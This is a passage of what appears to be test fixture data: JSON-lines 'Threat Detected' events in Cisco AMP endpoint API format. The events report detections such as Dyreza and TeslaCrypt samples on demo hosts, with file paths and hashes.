Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259080131182683","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228943","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":821000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261640","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261639","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261638","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":680000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261637","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":665000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261636","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":509000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259028591575000,"timestamp":1610705845,"timestamp_nanoseconds":984000000,"date":"2021-01-15T10:17:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259028591575130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251439135752000,"timestamp":1610705841,"timestamp_nanoseconds":455000000,"date":"2021-01-15T10:17:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251439135752194","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258981346935000,"timestamp":1610705834,"timestamp_nanoseconds":346000000,"date":"2021-01-15T10:17:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258981346934873","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258929807327000,"timestamp":1610705822,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258929807327320","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":470000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":112000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":71000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":532000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":454000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667841684537366","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537365","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258118058508000,"timestamp":1610705633,"timestamp_nanoseconds":636000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258118058508361","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667837389570000,"timestamp":1610705633,"timestamp_nanoseconds":689000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667837389570068","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258066518901000,"timestamp":1610705621,"timestamp_nanoseconds":608000000,"date":"2021-01-15T10:13:41+00:00","event_type":"Threat 